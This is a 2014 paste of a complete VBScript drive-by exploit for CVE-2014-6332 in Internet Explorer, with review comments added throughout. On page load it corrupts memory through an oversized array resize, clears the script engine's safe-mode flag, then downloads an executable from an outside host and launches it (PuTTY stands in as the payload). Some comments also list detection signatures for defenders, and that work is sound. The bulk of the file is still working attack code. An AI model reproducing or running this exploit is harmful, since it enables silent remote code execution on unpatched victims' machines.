
0 Day IE ExPLOIT FUNZ Tutmoses

a guest
Nov 22nd, 2014
  1. tutmoses: for educational purposes only, obviously. It's hardcoded for a reason, to at least protect some people, as this is dangerous if you put the right exe in its path.
  2.  
  3. //*
  4. tutmoses mod
  5. allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
  6. cve-2014-6332 exploit
  7. https://twitter.com/yuange75
  8. http://hi.baidu.com/yuange1975
  9.  
  10. *//
  11.  
  12. <!doctype html>
  13. <html>
  14. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
      <!-- NOTE(review): this directive asks Internet Explorer for its IE8 emulation document mode;
           presumably it is set so that the VBScript blocks below are still executed on newer
           IE versions (confirm). For content inspection at a proxy or IDS, a down-level
           X-UA-Compatible value combined with LANGUAGE="VBScript" script blocks is a useful
           signature for pages of this kind. -->
  15. <head>
  16. </head>
  17. <body>
  18.  
  19. <SCRIPT LANGUAGE="VBScript">
  20.  
  21. Sub Run(ByVal sFile)
      ' Starts the program at path sFile through a WScript.Shell COM object.
      ' sFile: path of the file to launch; Chr(34) wraps it in double quotes.
      ' Detection: the browser process instantiating WScript.Shell and then spawning a
      ' child process is the host-side observable for this routine.
  22. Dim shell
  23.  
  24. Set shell = CreateObject("WScript.Shell")
      ' Arguments to shell.Run: 1 = normal window style, false = do not wait for the process to exit.
  25. shell.Run Chr(34) & sFile & Chr(34), 1, false
  26. Set shell = Nothing
  27. End Sub
  28.  
  29. function runmumaa()
      ' Payload stage: downloads one file over HTTP, writes it to a fixed path and starts it via Run.
      ' Both the URL and the destination path are hard-coded; in this listing the URL is a PuTTY
      ' download link, used here as the stand-in executable.
      ' Observables for detection, in order: COM creation of Microsoft.XMLHTTP and Adodb.Stream
      ' from page script, a plain-HTTP GET for an .exe, an executable written under
      ' C:\yolobirdie\ by the browser process, then a child process started from that path.
  30.  
      ' oWMP is created but not used again in this function.
  31. Set oWMP = CreateObject("WMPlayer.OCX.7" )
  32. dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
  33. dim bStrm: Set bStrm = createobject("Adodb.Stream")
      ' Third argument False makes the request synchronous, so Send returns with the body available.
  34. xHttp.Open "GET", "http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe", False
  35. xHttp.Send
  36.  
      ' No status-code or content check is made before the response body is written to disk.
  37. with bStrm
  38. .type = 1 '//binary
  39. .open
  40. .write xHttp.responseBody
  41. .savetofile "C:\yolobirdie\putty.exe", 2 '//overwrite
  42. end with
  43.  
  44. Run "C:\yolobirdie\putty.exe"
  45. end function
  46.  
  47. </script>
  48.  
  49. <SCRIPT LANGUAGE="VBScript">
  50.  
  51. dim aa() ' dynamic array resized repeatedly by Over, mydata, ReadMemo and setnotsafemode
  52. dim ab() ' second dynamic array; its low elements are rewritten around each access to aa
  53. dim a0 ' working upper bound for aa (seeded in BeginInit, grown in Over)
  54. dim a1 ' a0+2, the aa index the other routines read and write (set in Over)
  55. dim a2 ' a0+&h8000000, the oversized bound passed to redim Preserve (set in Over)
  56. dim a3 ' amount added to a0 on each attempt (set in BeginInit)
  57. dim win9x ' set to 1 by Over when type1=&hB9AD; not read elsewhere in this listing
  58. dim intVersion ' MSIE major version parsed from the user agent in Begin
  59. dim rnda ' declared but not referenced in this listing
  60. dim funclass ' declared but not referenced in this listing
  61. dim myarray ' string of 16-bit values built in Begin and stored into aa(a1+2) by mydata
  62.  
  63. Begin() ' top-level call: runs when the script block is parsed, with no user interaction
  64.  
  65. function Begin()
      ' Entry point: checks the browser from the user-agent string, prepares the arrays,
      ' and on success hands over to runshellcode() or setnotsafemode().
      ' On Error Resume Next hides every runtime error, so a failed attempt leaves no script
      ' error dialog for the user to notice.
  66. On Error Resume Next
  67. info=Navigator.UserAgent
  68.  
      ' Stops when the user agent contains "Win64".
  69. if(instr(info,"Win64")>0) then
  70. exit function
  71. end if
  72.  
      ' Requires an "MSIE" token and reads the two characters after "MSIE " as the version number.
  73. if (instr(info,"MSIE")>0) then
  74. intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  75. else
  76. exit function
  77.  
  78. end if
  79.  
  80. win9x=0
  81.  
  82. BeginInit()
  83. If Create()=True Then
      ' Twelve 16-bit values built with ChrW.
      ' NOTE(review): presumably a hand-built array descriptor that setnotsafemode later
      ' indexes through aa(a1+2) - confirm against published analyses of the CVE named in the header.
  84. myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
  85. myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
  86.  
      ' runshellcode() is not defined anywhere in the visible listing; with On Error Resume Next
      ' the call for intVersion<4 would fail silently.
  87. if(intVersion<4) then
  88. document.write("<br> IE")
  89. document.write(intVersion)
  90. runshellcode()
  91. else
  92. setnotsafemode()
  93. end if
  94. end if
  95. end function
  96.  
  97. function BeginInit()
      ' Seeds the random generator and sets the starting array sizes.
      ' Rnd with a positive argument returns a value in [0,1), so a0 starts in [13,30) and
      ' a3 in [7,10); both differ from run to run, which means the concrete array sizes are
      ' not a stable value to match on when writing a signature.
  98. Randomize()
  99. redim aa(5)
  100. redim ab(5)
  101. a0=13+17*rnd(6)
  102. a3=7+3*rnd(5)
  103. end function
  104.  
  105. function Create()
       ' Retry loop: calls Over() up to 401 times (i = 0 To 400) and returns True as soon as
       ' one call succeeds, otherwise False. Each call to Over() changes a0, a1 and a2.
  106. On Error Resume Next
  107. dim i
  108. Create=False
  109. For i = 0 To 400
  110. If Over()=True Then
  111. ' document.write(i)
  112. Create=True
  113. Exit For
  114. End If
  115. Next
  116. end function
  117.  
  118. sub testaa()
       ' Intentionally empty; its only use in this listing is the assignment i=testaa in mydata.
  119. end sub
  120.  
  121. function mydata()
       ' Returns the value found in aa(a1) after aa has been resized to the oversized bound a2
       ' and the neighbouring ab elements have been rewritten; also stores myarray in aa(a1+2).
       ' NOTE(review): the double literals written to ab are denormal values whose raw bytes
       ' repeat a small constant in each 32-bit half; presumably they overwrite the type tag of
       ' the aa element that overlaps ab (type confusion) - confirm. The literals themselves are
       ' fixed text and therefore usable as static content-match strings.
  122. On Error Resume Next
  123. i=testaa
  124. i=null
  125. redim Preserve aa(a2)
  126.  
  127. ab(0)=0
  128. aa(a1)=i
  129. ab(0)=6.36598737437801E-314
  130.  
  131. aa(a1+2)=myarray
  132. ab(2)=1.74088534731324E-310
  133. mydata=aa(a1)
       ' Shrinks aa back to its normal bound before returning.
  134. redim Preserve aa(a0)
  135. end function
  136.  
  137.  
  138. function setnotsafemode()
       ' Follows a chain of three ReadMemo reads starting from mydata(), scans a fixed window of
       ' offsets for the value 14, overwrites the slot four bytes before the match with ab(4),
       ' and then calls runmumaa().
       ' NOTE(review): going by the name, the slot is presumably the script engine's safe-mode
       ' flag, whose clearing lets the CreateObject calls in runmumaa and Run proceed - confirm.
       ' ab(4) is never assigned in this listing.
       ' For defenders the reliable signal is what follows: COM object creation and a process
       ' launch from page script that the browser would otherwise refuse.
  139. On Error Resume Next
  140. i=mydata()
  141. i=readmemo(i+8)
  142. i=readmemo(i+16)
       ' This first value of j is overwritten by the loop below before it is used.
  143. j=readmemo(i+&h134)
  144. for k=0 to &h60 step 4
  145. j=readmemo(i+&h120+k)
  146. if(j=14) then
  147. j=0
  148. redim Preserve aa(a2)
  149. aa(a1+2)(i+&h11c+k)=ab(4)
  150. redim Preserve aa(a0)
  151.  
  152. j=0
       ' Reads the same location again; the result is not checked.
  153. j=readmemo(i+&h120+k)
  154.  
  155. Exit for
  156. end if
  157.  
  158. next
  159. ab(2)=1.69759663316747E-313
       ' Called whether or not the loop found a match.
  160. runmumaa()
  161. end function
  162.  
  163. function Over()
       ' One attempt: grows a0 by a3, derives a1 and a2, resizes aa to the oversized bound a2 and
       ' checks whether the element at aa(a1) now reports one of two expected VarType values.
       ' Returns True on a match; sets win9x=1 for the second value. aa is shrunk back to a0
       ' on every exit path.
       ' NOTE(review): the failing "redim Preserve aa(a2)" under On Error Resume Next is presumably
       ' the trigger for the CVE named in the paste header, leaving aa with a bound larger than
       ' its storage - confirm. A resize by a constant near &h8000000 with errors suppressed is
       ' the pattern to look for in script content; systems carrying the vendor fix for that CVE,
       ' or with VBScript disabled in the browser, should not reach the success branch.
  164. On Error Resume Next
  165. dim type1,type2,type3
  166. Over=False
  167. a0=a0+a3
  168. a1=a0+2
  169. a2=a0+&h8000000
  170.  
  171. redim Preserve aa(a0)
  172. redim ab(a0)
  173.  
  174. redim Preserve aa(a2)
  175.  
  176. type1=1
       ' Marker double written into ab; the two constants tested at the end appear to be derived
       ' from its bytes - TODO confirm.
  177. ab(0)=1.123456789012345678901234567890
  178. aa(a0)=10
  179.  
       ' Probes aa(a1-1) and aa(a1), both past the normal bound a0. For intVersion<4 an extra
       ' VarType comparison against a value computed from a0 is made first, and a mismatch
       ' ends the attempt.
  180. If(IsObject(aa(a1-1)) = False) Then
  181. if(intVersion<4) then
  182. mem=cint(a0+1)*16
  183. j=vartype(aa(a1-1))
  184. if((j=mem+4) or (j*8=mem+8)) then
  185. if(vartype(aa(a1-1))<>0) Then
  186. If(IsObject(aa(a1)) = False ) Then
  187. type1=VarType(aa(a1))
  188. end if
  189. end if
  190. else
  191. redim Preserve aa(a0)
  192. exit function
  193.  
  194. end if
  195. else
  196. if(vartype(aa(a1-1))<>0) Then
  197. If(IsObject(aa(a1)) = False ) Then
  198. type1=VarType(aa(a1))
  199. end if
  200. end if
  201. end if
  202. end if
  203.  
  204.  
       ' Success test: type1 stays 1 unless one of the probes above replaced it.
  205. If(type1=&h2f66) Then
  206. Over=True
  207. End If
  208. If(type1=&hB9AD) Then
  209. Over=True
  210. win9x=1
  211. End If
  212.  
  213. redim Preserve aa(a0)
  214.  
  215. end function
  216.  
  217. function ReadMemo(add)
       ' Stores add+4 in aa(a1), rewrites ab(0), and returns LenB(aa(a1)); ab(0) is then reset
       ' to 0 and aa shrunk back to a0.
       ' NOTE(review): presumably the ab(0) write makes aa(a1) be treated as a string, so that
       ' LenB returns the 32-bit value stored at address add, i.e. a memory-read helper for
       ' setnotsafemode - confirm.
       ' The literal 1.69759663316747E-313 also appears in setnotsafemode and is fixed text
       ' that can be matched in content inspection.
  218. On Error Resume Next
  219. redim Preserve aa(a2)
  220.  
  221. ab(0)=0
  222. aa(a1)=add+4
  223. ab(0)=1.69759663316747E-313
  224. ReadMemo=lenb(aa(a1))
  225.  
  226. ab(0)=0
  227.  
  228. redim Preserve aa(a0)
  229. end function
  230.  
  231. </script>
  232.  
  233. </body>
  234. </html>